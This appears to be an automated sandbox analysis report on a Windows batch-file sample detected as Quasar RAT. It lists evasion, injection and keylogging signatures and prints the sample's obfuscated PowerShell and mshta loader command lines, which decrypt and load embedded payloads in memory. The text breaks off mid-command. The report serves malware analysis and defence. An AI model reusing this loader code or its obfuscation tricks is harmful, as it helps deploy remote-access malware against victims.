Edit tour
Windows
Analysis Report
Shadow-Stealer.bat
Overview
General Information
Detection
Quasar
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS
Powershell is started from unusual location (likely to bypass HIPS)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Found large BAT file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Powershell connects to network
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Classification
- System is w10x64
- cmd.exe (PID: 1668 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\Shado w-Stealer. bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Shadow-Stealer.bat.exe (PID: 3180 cmdline:
"Shadow-St ealer.bat. exe" -nopr ofile -win dowstyle h idden -ep bypass -co mmand func tion pXqKy ($AMMuC){ $QAuMi=[Sy stem.Secur ity.Crypto graphy.Aes ]::Create( ); $QAuMi. Mode=[Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::CB C; $QAuMi. Padding=[S ystem.Secu rity.Crypt ography.Pa ddingMode] ::PKCS7; $ QAuMi.Key= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('lo y14lThS3Sg Wk7zmlM+U1 LaSbD9l9+G RTu5mLzp2m M='); $QAu Mi.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('lS2Ypg JeBrTrEw/f JyL2OQ==') ; $LSyot=$ QAuMi.Crea teDecrypto r(); $retu rn_var=$LS yot.Transf ormFinalBl ock($AMMuC , 0, $AMMu C.Length); $LSyot.Di spose(); $ QAuMi.Disp ose(); $re turn_var;} function Y aPup($AMMu C){ $BpqPy =New-Objec t System.I O.MemorySt ream(,$AMM uC); $MUxy L=New-Obje ct System. IO.MemoryS tream; $QR zEr=New-Ob ject Syste m.IO.Compr ession.GZi pStream($B pqPy, [IO. Compressio n.Compress ionMode]:: Decompress ); $QRzEr. CopyTo($MU xyL); $QRz Er.Dispose (); $BpqPy .Dispose() ; $MUxyL.D ispose(); $MUxyL.ToA rray();}fu nction dAv Ur($AMMuC, $oAPri){ $ TIrdu=[Sys tem.Reflec tion.Assem bly]::('da oL'[-1..-4 ] -join '' )([byte[]] $AMMuC); $ cmozY=$TIr du.EntryPo int; $cmoz Y.Invoke($ null, $oAP ri);}$agzC o=[System. IO.File]:: ('txeTllAd aeR'[-1..- 11] -join '')('C:\Us ers\user\D esktop\Sha dow-Steale r.bat').Sp lit([Envir onment]::N ewLine);fo reach ($xW gWP in $ag zCo) { if ($xWgWP.St artsWith(' SEROXEN')) { $gZeLJ= $xWgWP.Sub string(7); break; }} $paQQY=[st ring[]]$gZ eLJ.Split( '\');$ahdV x=YaPup (p XqKy ([Con vert]::('g nirtS46esa BmorF'[-1. .-16] -joi n '')($paQ QY[0])));$ qbiwj=YaPu p (pXqKy ( [Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( $paQQY[1]) ));dAvUr $ qbiwj (,[s tring[]] ( '', 'idTzn CCsreqaEEj vuwzuTuitg lIVMFHEuLs TnnuHsLwyM mxaqK', 'L kIzMJCsatT hEdeYOSSAw nZMOfyqejP cYtnoxQiuO bLPDohIJN' ));dAvUr $ ahdVx (,[s tring[]] ( '', 'idTzn CCsreqaEEj vuwzuTuitg lIVMFHEuLs TnnuHsLwyM mxaqK', 'L kIzMJCsatT hEdeYOSSAw nZMOfyqejP cYtnoxQiuO bLPDohIJN' )); MD5: 04029E121A0CFA5991749937DD22A1D9) - dllhost.exe (PID: 3940 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{2ca74e 05-00fd-4f 33-afb0-1b aa728859ba } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - dllhost.exe (PID: 1036 cmdline:
C:\Windows \SysWOW64\ dllhost.ex e /Process id:{a795ed 5e-f9f8-4b 9c-9e39-bf 732c676d16 } MD5: 6F3C9485F8F97AC04C8E43EF4463A68C) - dllhost.exe (PID: 5576 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{3885b7 22-1a15-44 b5-b09d-ff 91e5413f87 } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - dllhost.exe (PID: 964 cmdline:
C:\Windows \SysWOW64\ dllhost.ex e /Process id:{99a849 d9-b898-48 bd-a9ae-8d 2739f763c9 } MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
- $sxr-mshta.exe (PID: 2616 cmdline:
C:\Windows \$sxr-msht a.exe "jav ascript:do cument['wr '+'it'+'e' ]('<h'+'tm '+'l>'+'<s '+'cr'+'ip '+'t\x20'+ 'la'+'ng'+ 'ua'+'ge'+ '=\x22'+'V B'+'Sc'+'r i'+'pt'+'\ x22>'+'Se' +'t\x20'+' ob'+'jS'+' he'+'ll'+' \x20='+'\x 20C'+'re'+ 'at'+'eO'+ 'bj'+'ec'+ 't('+'\x22 W'+'Sc'+'r i'+'pt'+'. S'+'he'+'l l'+'\x22)' +'\x20:'+' \x20o'+'bj '+'Sh'+'el '+'l.'+'Ru '+'n\x20'+ '\x22C:\\W indows\\$s xr-c'+'md' +'.e'+'xe' +'\x20/'+' c %'+'$sxr -tjptoUybj VuvgCOJtIW n4312:&#<? =%'+'\x22, '+'\x200'+ ',\x20'+'T r'+'ue'+'< /'+'sc'+'r i'+'pt'+'> <'+'/h'+'t m'+'l>');c lose();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - $sxr-cmd.exe (PID: 1804 cmdline:
"C:\Window s\$sxr-cmd .exe" /c % $sxr-tjpto UybjVuvgCO JtIWn4312: &#<?=% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2244 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - $sxr-powershell.exe (PID: 6400 cmdline:
C:\Windows \$sxr-powe rshell.exe -NoLogo - NoProfile -Nonintera ctive -Win dowStyle h idden -Exe cutionPoli cy bypass -Command f unction VO HZF($Lwtxx ){ $xCaUG= [System.Se curity.Cry ptography. Aes]::Crea te(); $xCa UG.Mode=[S ystem.Secu rity.Crypt ography.Ci pherMode]: :CBC; $xCa UG.Padding =[System.S ecurity.Cr yptography .PaddingMo de]::PKCS7 ; $xCaUG.K ey=[System .Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( 'TM3zfpDKM ZynPMfLQy1 uVeWzaY6Dh wGL3hPqgMb 2Tk0='); $ xCaUG.IV=[ System.Con vert]::('g nirtS46esa BmorF'[-1. .-16] -joi n '')('zUM RaMteR/3la 6UhCTH1Gg= ='); $CTnv z=$xCaUG.( 'rotpyrceD etaerC'[-1 ..-15] -jo in '')(); $oMfGF=$CT nvz.('kcol BlaniFmrof snarT'[-1. .-19] -joi n '')($Lwt xx, 0, $Lw txx.Length ); $CTnvz. Dispose(); $xCaUG.Di spose(); $ oMfGF;}fun ction nnKo f($Lwtxx){ $ABMbT=Ne w-Object S ystem.IO.M emoryStrea m(,$Lwtxx) ; $FswzF=N ew-Object System.IO. MemoryStre am; $ZWQus =New-Objec t System.I O.Compress ion.GZipSt ream($ABMb T, [IO.Com pression.C ompression Mode]::Dec ompress); $ZWQus.Cop yTo($FswzF ); $ZWQus. Dispose(); $ABMbT.Di spose(); $ FswzF.Disp ose(); $Fs wzF.ToArra y();}funct ion vzvJZ( $Lwtxx,$kA WoQ){ $kXI pu=[System .Reflectio n.Assembly ]::Load([b yte[]]$Lwt xx); $OPPD g=$kXIpu.E ntryPoint; $OPPDg.In voke($null , $kAWoQ); }$xCaUG1 = New-Objec t System.S ecurity.Cr yptography .AesManage d;$xCaUG1. Mode = [Sy stem.Secur ity.Crypto graphy.Cip herMode]:: CBC;$xCaUG 1.Padding = [System. Security.C ryptograph y.PaddingM ode]::PKCS 7;$xCaUG1. Key = [Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('TM3zfp DKMZynPMfL Qy1uVeWzaY 6DhwGL3hPq gMb2Tk0=') ;$xCaUG1.I V = [Syste m.Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ('zUMRaMte R/3la6UhCT H1Gg==');$ qsFQP = $x CaUG1.('ro tpyrceDeta erC'[-1..- 15] -join '')();$UMI rZ = [Syst em.Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )('2twxIFM V1JWyz0b8B pHEfA=='); $UMIrZ = $ qsFQP.('kc olBlaniFmr ofsnarT'[- 1..-19] -j oin '')($U MIrZ, 0, $ UMIrZ.Leng th);$UMIrZ = [System .Text.Enco ding]::('8 FTU'[-1..- 4] -join ' ').('gnirt SteG'[-1.. -9] -join '')($UMIrZ );$PYyQA = [System.C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')('p 05ztWCKuMf os2Q8RYoS+ FIXy2DypHH byYGL6Z+cE c8=');$PYy QA = $qsFQ P.('kcolBl aniFmrofsn arT'[-1..- 19] -join '')($PYyQA , 0, $PYyQ A.Length); $PYyQA = [ System.Tex t.Encoding ]::('8FTU' [-1..-4] - join '').( 'gnirtSteG '[-1..-9] -join '')( $PYyQA);$r oofG = [Sy stem.Conve rt]::('gni rtS46esaBm orF'[-1..- 16] -join '')('Sy8Hc JTfKA/mf4h PH+Go6g==' );$roofG = $qsFQP.(' kcolBlaniF mrofsnarT' [-1..-19] -join '')( $roofG, 0, $roofG.Le ngth);$roo fG = [Syst em.Text.En coding]::( '8FTU'[-1. .-4] -join '').('gni